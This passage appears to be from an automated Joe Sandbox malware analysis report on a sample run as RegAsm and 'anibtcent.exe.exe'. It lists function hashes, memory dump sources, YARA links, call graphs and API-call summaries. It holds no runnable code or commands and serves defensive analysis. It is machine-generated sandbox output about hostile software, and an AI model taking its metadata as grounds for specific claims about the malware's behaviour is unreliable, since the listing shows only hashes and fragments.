                                  • Instruction Fuzzy Hash: 4A01AD30900218CFCB20EFB8C9C0AAE7FB6FB85B00F40456AC50A97242D7315544CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE392B, Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80ad9391c69632aa3fd5331bf64eb1ca77c3e31a2c30088a611058dd85cabaf5
                                  • Instruction ID: ff2503cf1f0a5a70090bdbf2db7fda4b93a88655340458d0bc815a67152f7eff
                                  • Opcode Fuzzy Hash: 80ad9391c69632aa3fd5331bf64eb1ca77c3e31a2c30088a611058dd85cabaf5
                                  • Instruction Fuzzy Hash: B7F01D75E001199FCB40DFBCD8456DEBFF5EB98250F6001BAD509E7301E6359A018BE6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE0A68, Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ad6c4a5d3ea2017d72147fdac2d37b9a8db54a9e5b597e6ec9e5ea85684d752
                                  • Instruction ID: e5c421eca5e07f409f8030a41472aa7255f3376d7333b688c7a17d9547ce42ea
                                  • Opcode Fuzzy Hash: 8ad6c4a5d3ea2017d72147fdac2d37b9a8db54a9e5b597e6ec9e5ea85684d752
                                  • Instruction Fuzzy Hash: 08F03A72E002299FCB40DFB99C402AEBBF5EB88690B124579D60AE3200E63059018BE0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE2C33, Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 414470c13e5bd3fe24203320d8a64426ed8765cc8491faf72f00a71e2493bb29
                                  • Instruction ID: 8bb6b33559c2c433e98bb1ecdd9f44f799989e23cebd716672a51953ef270c38
                                  • Opcode Fuzzy Hash: 414470c13e5bd3fe24203320d8a64426ed8765cc8491faf72f00a71e2493bb29
                                  • Instruction Fuzzy Hash: 73F02030E0425A5ACF04DEBEAC149DFBFF9DFE8222F4449B5D948E3141E931A81183E2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1DB40EC4, Relevance: .0, Instructions: 30COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320683231.000000001DB40000.00000040.00000040.sdmp, Offset: 1DB40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db40000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b0820154c3f26c0d41788179339f31418b5969b19dd37f7ea61e9393507a2475
                                  • Instruction ID: 3d292b34bcbb0ba491f2ca269463cd07a7224b6c8f4ed43f5521b3736811b127
                                  • Opcode Fuzzy Hash: b0820154c3f26c0d41788179339f31418b5969b19dd37f7ea61e9393507a2475
                                  • Instruction Fuzzy Hash: 9EF0EC35548685DFC306CB40D544F16FBA2FB89718F24C6ADE9490B762C7379823DA82
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1DB40606, Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320683231.000000001DB40000.00000040.00000040.sdmp, Offset: 1DB40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db40000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2ef9a42db8349f55a1aaf35add6623047cf65077ea77e063208ef9e32d989618
                                  • Instruction ID: 9ec19f38f91cf876f00f5ab16dd8433a34c233cf33eb286d7666e5fc4007c3e3
                                  • Opcode Fuzzy Hash: 2ef9a42db8349f55a1aaf35add6623047cf65077ea77e063208ef9e32d989618
                                  • Instruction Fuzzy Hash: 65E092B66006048BD650DF0AEC81462FBD4EB84630B08C47FDC0D8B701D639F504CEA5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 204E1C37, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326364848.00000000204E0000.00000040.00000001.sdmp, Offset: 204E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204e0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a313993b49b7cfa5a7b12ea8719a04bd1e811f5a05bb628b2a181c214ce49bc
                                  • Instruction ID: a3380f42ef716014e4a67cd4aded362591df780a1b1ef45c5fd1d05a5c9aee37
                                  • Opcode Fuzzy Hash: 8a313993b49b7cfa5a7b12ea8719a04bd1e811f5a05bb628b2a181c214ce49bc
                                  • Instruction Fuzzy Hash: 0DE0D8B65403006BD210DF069C86B23FB98DB90930F04C46BED085B342D575B514C9F5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 204E14E3, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326364848.00000000204E0000.00000040.00000001.sdmp, Offset: 204E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204e0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fcc65fca6bf5bc08fce65d7229c4634446aca2c622d5f31540427e3ef61cfc0
                                  • Instruction ID: 767e2a0469f02299736618e7ae63b56f2867455ec183355bbf416f3ca980bf53
                                  • Opcode Fuzzy Hash: 7fcc65fca6bf5bc08fce65d7229c4634446aca2c622d5f31540427e3ef61cfc0
                                  • Instruction Fuzzy Hash: 79E0D8B65002006BD210DF069C86B23FB98DB80930F04C45BED095B302D576B614CDE5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 204E1ABF, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326364848.00000000204E0000.00000040.00000001.sdmp, Offset: 204E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204e0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a0728d03457e3c94523a9064dddb2b85a901eb1f3d52ea7f1588ddcdfab42a0
                                  • Instruction ID: c6a80e7c7158efe401e235a383ff054fbffdec685f37af4095b1ff0ee0f04854
                                  • Opcode Fuzzy Hash: 3a0728d03457e3c94523a9064dddb2b85a901eb1f3d52ea7f1588ddcdfab42a0
                                  • Instruction Fuzzy Hash: 56E0D8B65003046BD250DF069C86B23FB98DB40930F08C45BED095B302D576B514C9F5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1DB2AD93, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320432090.000000001DB22000.00000040.00000001.sdmp, Offset: 1DB22000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db22000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d552fb3dc9fe129d876fd2a6dc1e1f40bb8a42c35a24f736aca98a70900b5ca
                                  • Instruction ID: 2dca046eb1cb13f76a76fe72f2c487e578205ecccafba4e6ab91efb7d5e51df1
                                  • Opcode Fuzzy Hash: 1d552fb3dc9fe129d876fd2a6dc1e1f40bb8a42c35a24f736aca98a70900b5ca
                                  • Instruction Fuzzy Hash: 6AE0D8B65402046BD210DF069C86B33FB58DB40930F04C557ED095B302D575B514CDF5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE0480, Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73372ddf18d5fa3b5218e3800255283148c254b6b6a706df76e43ac937989450
                                  • Instruction ID: 67597b798a50429080a72e7c2220b7cbfdf31bdf8f40ca01c70cb88b9c5f57ed
                                  • Opcode Fuzzy Hash: 73372ddf18d5fa3b5218e3800255283148c254b6b6a706df76e43ac937989450
                                  • Instruction Fuzzy Hash: A0D0A732250110CFC2045FB4C584F453BF9EB99A20B50859CE00FC3613CE78B4588701
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1DB123F4, Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320272155.000000001DB12000.00000040.00000001.sdmp, Offset: 1DB12000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db12000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 688fdb15554ab4f98e0e7c262685f98f7b5fced2cfc6778bee7892e6ca9f6a38
                                  • Instruction ID: b4c22d6fbd1c8cc55283eb143cc074c21154ac2161a50cb69bde4aac7fed9807
                                  • Opcode Fuzzy Hash: 688fdb15554ab4f98e0e7c262685f98f7b5fced2cfc6778bee7892e6ca9f6a38
                                  • Instruction Fuzzy Hash: 37D05EB96046918FD3029E18D1E2BA53BD4AB92B14F4644FAA8018F763C768E581D201
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1DB123BC, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320272155.000000001DB12000.00000040.00000001.sdmp, Offset: 1DB12000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db12000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c06fa0147e6fa775c20270cc48eaece7b410ab7d35ab14cf6fb796f3b6dcfd4a
                                  • Instruction ID: 75f03b1032138adc8e528f4998b8b3bfc286d9e9281671bbb0ffec6687ec9b43
                                  • Opcode Fuzzy Hash: c06fa0147e6fa775c20270cc48eaece7b410ab7d35ab14cf6fb796f3b6dcfd4a
                                  • Instruction Fuzzy Hash: 52D05E756002814FDB01DE08E2D1F6937D8AB80B04F0244F8BC028F362C7B4D9C0D600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE1581, Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 309b721594f5aeb93eeebfeb58abfbe9fc45ef6dd39bfa957b3b79d5845acaba
                                  • Instruction ID: 6a2546652d9e546f1a3ce9a16e86a078800b9a95bddfbbf26585eb4eb4a9f148
                                  • Opcode Fuzzy Hash: 309b721594f5aeb93eeebfeb58abfbe9fc45ef6dd39bfa957b3b79d5845acaba
                                  • Instruction Fuzzy Hash: 5EC01236F40004C7DF04F7F0F8851DCB374EA842257200C61D117A3041DF311A148711
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 1FEE461B, Relevance: .0, Instructions: 3COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6809a6600e4ad008811920de9b67d3e606602a4e873f39f8e54ac121db8cdcf0
                                  • Instruction ID: ed44dccd74fdf5137b63766e97b9beac33a5c9f9cfcb0aaf1942a959e15f9286
                                  • Opcode Fuzzy Hash: 6809a6600e4ad008811920de9b67d3e606602a4e873f39f8e54ac121db8cdcf0
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  Function 00F01E6C, Relevance: .3, Instructions: 327COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction ID: f879074a26d75de709c4038cb0b0d994f85ddf4f8e99a136bb9af4a01dee6f28
                                  • Opcode Fuzzy Hash: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction Fuzzy Hash: 25B1BE71700612EFD754DF28CC95BD6B3A4FF197A4F184329EC99932C1DB38A851ABA0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00F08F5A, Relevance: .3, Instructions: 301COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction ID: 846d0599b74dac56eeecebc330f81b9c5c1ea91ceb700d4ca30ffde8960a3157
                                  • Opcode Fuzzy Hash: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction Fuzzy Hash: F1A168B174030A6FFB215E24CD86BEA376BEF56350F544228FE44A71C1C7B99888B740
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00F0949D, Relevance: .2, Instructions: 227COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadMemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 3389902171-0
                                  • Opcode ID: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction ID: 392371d2e290a5de4da744febd869d614db97fb6741a5274895877777245a725
                                  • Opcode Fuzzy Hash: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction Fuzzy Hash: 7581A470F083429EDF25DE2888D4755BAD19F62370F4882ADCD968B2D7E3758442E722
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00F08799, Relevance: .0, Instructions: 26COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction ID: 63ef1cd3f2dbd4ea04451e465c30ce43b3c805be8753609f8638e4e862f5a60f
                                  • Opcode Fuzzy Hash: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction Fuzzy Hash: 00E06D3E3102008FC314CA28C9C4F55B3A1AB593A0F254555E9818B2E9CA34EC41F610
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00F04109, Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction ID: 69ca0ad0998cba72f24453d1fa79299cab4a71c97103bf1c9cf6a5a198bfed4e
                                  • Opcode Fuzzy Hash: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction Fuzzy Hash: 32C04CB6240481CFEF55DA08C891B947361B769744BD944D0E046CBA95C318ED41DA00
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00F081B7, Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction ID: b933d7a8f0b1c7a96fb1429829bcf9fa5e697247fe5bddf5ae2b1ed24a185623
                                  • Opcode Fuzzy Hash: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction Fuzzy Hash: 03B092313106408FCA51CE19C1D0F80B3E0BF00A40B8244A4E00187A51C364E804C900
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00F09E56, Relevance: .0, Instructions: 3COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction ID: b36b371992250da8c45f1cd1506764a1d816c012ef71655a4cc1844282d2f311
                                  • Opcode Fuzzy Hash: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Analysis Process: anibtcent.exe.exe PID: 4188 Parent PID: 1440 anibtcent.exe.exeCOMMON

                                  Execution Graph

                                  Execution Coverage:26.3%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:29
                                  Total number of Limit Nodes:2

                                  Graph

                                  execution_graph 828 50f0047 829 50f0070 828->829 830 50f0087 829->830 831 50f00b9 2 API calls 829->831 831->830 832 113a35a 833 113a38e FindCloseChangeNotification 832->833 835 113a3c8 833->835 836 113a4aa 838 113a4de WriteFile 836->838 839 113a545 838->839 804 113a38e 805 113a3ba FindCloseChangeNotification 804->805 806 113a3f9 804->806 807 113a3c8 805->807 806->805 808 113a4de 810 113a513 WriteFile 808->810 811 113a545 810->811 812 50f0070 813 50f0087 812->813 815 50f00b9 812->815 816 50f00c5 815->816 817 50f011a 816->817 820 113a25e 816->820 824 113a23c 816->824 817->813 821 113a2b0 820->821 822 113a287 GetConsoleOutputCP 820->822 821->822 823 113a29c 822->823 823->817 825 113a25e GetConsoleOutputCP 824->825 827 113a29c 825->827 827->817

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00856086 1 Function_01132310 2 Function_01132710 3 Function_0113A210 4 Function_01132194 5 Function_0113A09A 6 Function_01132098 7 Function_029C0710 8 Function_029C000C 9 Function_0113A407 10 Function_01132006 11 Function_0113A005 12 Function_050F0D19 17 Function_050F0D90 12->17 23 Function_050F0DA0 12->23 13 Function_029C0606 14 Function_0113A38E 15 Function_029C0002 16 Function_050F0710 36 Function_050F0CC8 16->36 17->17 17->23 18 Function_01132430 19 Function_029C05BF 20 Function_011322B4 21 Function_0113A43A 22 Function_008543AC 23->17 23->23 24 Function_011323BC 25 Function_0113213C 26 Function_0113A23C 27 Function_00856BB7 28 Function_0113A120 29 Function_050F0E3B 30 Function_050F00B9 30->26 41 Function_0113A25E 30->41 31 Function_050F01B7 31->13 31->16 31->31 35 Function_029C05DF 31->35 31->36 43 Function_050F0AC1 31->43 45 Function_029C0648 31->45 32 Function_0113A4AA 33 Function_0113A02E 34 Function_011320D0 36->12 37 Function_050F0047 37->13 37->30 37->31 37->35 37->45 53 Function_011323F4 37->53 38 Function_0113A35A 39 Function_00856D4F 40 Function_01132458 42 Function_0113A4DE 43->36 44 Function_029C05CF 59 Function_029C066A 45->59 46 Function_0113A2C7 47 Function_01132044 48 Function_0113A148 49 Function_0113A172 50 Function_050F02EE 51 Function_011321F0 52 Function_029C067F 54 Function_0113A1F4 55 Function_029C0074 56 Function_0113A078 57 Function_011324FC 58 Function_029C026D 60 Function_01132264 61 Function_01132364 62 Function_0113A2EE 63 Function_0085687B 64 Function_050F0070 64->13 64->30 64->31 64->35 64->45 64->53

                                  Executed Functions

                                  Function 050F01B7, Relevance: .6, Instructions: 574COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b82abebe9a4b3d6a5e35ee93902062a59404021cc8cbe326cc96360b5dd55f62
                                  • Instruction ID: 6eda280f46b44ebd9b3992b5144409a7d52d54a97928b41ffc097586e83482ea
                                  • Opcode Fuzzy Hash: b82abebe9a4b3d6a5e35ee93902062a59404021cc8cbe326cc96360b5dd55f62
                                  • Instruction Fuzzy Hash: 2332C234704209DFDB18EF24E5A8A6EB7F3FF88300F148569D6469B656DB71E841CB90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 0113A4AA, Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 113a4aa-113a535 4 113a537-113a557 WriteFile 0->4 5 113a579-113a57e 0->5 8 113a580-113a585 4->8 9 113a559-113a576 4->9 5->4 8->9
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E2C,260ADA47,00000000,00000000,00000000,00000000), ref: 0113A53D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 7a7f23b56fc261d4f61782e4dc0d2d488081a48e2205fdb7ee5c0754e1332c44
                                  • Instruction ID: a62bccc3e848b95e08a373406e242c59552dbc2e32928b2ad75e1987ffcd971a
                                  • Opcode Fuzzy Hash: 7a7f23b56fc261d4f61782e4dc0d2d488081a48e2205fdb7ee5c0754e1332c44
                                  • Instruction Fuzzy Hash: 3E2160715093806FD7228B659C84B96BFB8EF46210F08859BE9849B1A3D365A509CB71
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 0113A35A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 12 113a35a-113a3b8 14 113a3ba-113a3c2 FindCloseChangeNotification 12->14 15 113a3f9-113a3fe 12->15 17 113a3c8-113a3da 14->17 15->14 18 113a400-113a405 17->18 19 113a3dc-113a3f8 17->19 18->19
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0113A3C0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 3abde9e919563c395dfa5d6a329b574c3e1dd5af08c8d49e6a24f24a81e31fd2
                                  • Instruction ID: 87714cabf8a589e0a3bd9096cb68c441f14ed147e8a1cf166d9b5b170afe1c76
                                  • Opcode Fuzzy Hash: 3abde9e919563c395dfa5d6a329b574c3e1dd5af08c8d49e6a24f24a81e31fd2
                                  • Instruction Fuzzy Hash: 6C21AF715093C09FD7128B25DC85792BFB4EF42220F0984EBED85CF263C278A948CB61
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 0113A4DE, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 21 113a4de-113a535 24 113a537-113a53f WriteFile 21->24 25 113a579-113a57e 21->25 27 113a545-113a557 24->27 25->24 28 113a580-113a585 27->28 29 113a559-113a576 27->29 28->29
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E2C,260ADA47,00000000,00000000,00000000,00000000), ref: 0113A53D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: fe62f967c8858bb1c227c34ca0b7fc11b0b407452c316ec232bb7cec836fcc38
                                  • Instruction ID: 024b62690642d8c7c9ae614eaf85088113cda0e0b8584cdb7f2473722fd05b81
                                  • Opcode Fuzzy Hash: fe62f967c8858bb1c227c34ca0b7fc11b0b407452c316ec232bb7cec836fcc38
                                  • Instruction Fuzzy Hash: FF110472500340AFEB21DF55EC84BA6FBA8EF84320F04845AED85DB296C375A504CBB1
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Function 0113A23C, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 32 113a23c-113a285 34 113a2b0-113a2b5 32->34 35 113a287-113a29a GetConsoleOutputCP 32->35 34->35 36 113a2b7-113a2bc 35->36 37 113a29c-113a2af 35->37 36->37
                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 0113A28D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: 68e671d9fbed6bef47b3f2c6b789e1174bc38f8fdb197dd15df7c600c43209da
                                  • Instruction ID: 7935d82d8b08bd0e3ed31e273c3d5bca71f34c09e3bae6e2da761a0ed723b020
                                  • Opcode Fuzzy Hash: 68e671d9fbed6bef47b3f2c6b789e1174bc38f8fdb197dd15df7c600c43209da
                                  • Instruction Fuzzy Hash: 720180755097C49FC7128B55DC84B52FFA4EF46220F0980DAED858F263D279A948CBA2
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Function 0113A38E, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
